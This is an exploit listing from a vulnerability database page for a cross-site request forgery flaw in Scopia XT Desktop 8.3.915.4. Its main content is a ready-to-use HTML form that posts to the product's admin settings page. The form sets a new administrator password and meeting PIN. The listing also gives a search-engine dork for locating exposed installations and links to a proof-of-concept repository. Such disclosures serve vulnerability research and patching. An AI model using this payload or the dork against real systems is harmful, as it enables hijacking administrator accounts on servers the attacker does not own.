Scopia XT Desktop 8.3.915.4 Cross-Site Request Forgery (change admin password)

2020.09.10
Credit: v1n1v131r4
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password) # Google Dork: inurl:scopia+index.jsp # Date: 2020-09-09 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://avaya.com # Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605 # Version: 8.3.915.4 # Tested on: Windows 10 Pro # CVE : N/A # PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 # CSRF to change admin password # The admin password will be changed to "attacker" <!DOCTYPE html> <html> <body> <form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp"> <input type="text" name="JSESSIONID" value=""> <input type="text" name="newadminusername" value=""> <input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C"> <input type="text" name="newenablext1000meetingpin" value="false"> <input type="text" name="newxt1000meetingpin" value="EB8169F43227957C"> <input type="text" name="checkstatus" value="true"> <input type="submit" value="Send"> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top